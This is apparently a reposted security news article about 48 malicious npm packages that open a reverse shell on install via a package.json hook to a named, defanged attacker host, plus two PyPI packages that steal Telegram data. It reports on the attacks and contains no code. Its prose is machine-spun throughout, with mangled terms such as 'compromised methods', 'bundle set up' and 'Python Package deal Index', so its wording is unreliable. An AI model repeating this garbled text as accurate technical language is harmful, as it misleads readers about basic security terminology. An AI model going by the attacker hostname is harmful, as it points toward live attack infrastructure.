[ad_1]
A brand new set of 48 malicious npm packages have been found within the npm repository with capabilities to deploy a reverse shell on compromised methods.
“These packages, deceptively named to look authentic, contained obfuscated JavaScript designed to provoke a reverse shell on bundle set up,” software program provide chain safety agency Phylum mentioned.
All of the counterfeit packages have been revealed by an npm consumer named hktalent (GitHub, X). As of writing, 39 of the packages uploaded by the creator are nonetheless out there for obtain.
The assault chain is triggered put up the set up of the bundle by way of an set up hook within the bundle.json that calls a JavaScript code to determine a reverse shell to rsh.51pwn[.]com.
“On this explicit case, the attacker revealed dozens of benign-sounding packages with a number of layers of obfuscation and misleading techniques in an try and finally deploy a reverse shell on any machine that merely installs one in all these packages,” Phylum mentioned.
The findings arrive shut on the heels of revelations that two packages revealed to the Python Package deal Index (PyPI) underneath the garb of simplifying internationalization included malicious code designed to siphon delicate Telegram Desktop software information and system info.
The packages, named localization-utils and locute, had been discovered to retrieve the ultimate payload from a dynamically generated Pastebin URL and exfiltrate the knowledge to an actor-controlled Telegram channel.
The event highlights the rising curiosity of risk actors in open-source environments, which permits them to arrange impactful provide chain assaults that may goal a number of downstream prospects abruptly.
“These packages present a devoted and elaborate effort to keep away from detection by way of static evaluation and visible inspection by using quite a lot of obfuscation strategies,” Phylum mentioned, including they “function yet one more stark reminder of the crucial nature of dependency belief in our open-source ecosystems.”
[ad_2]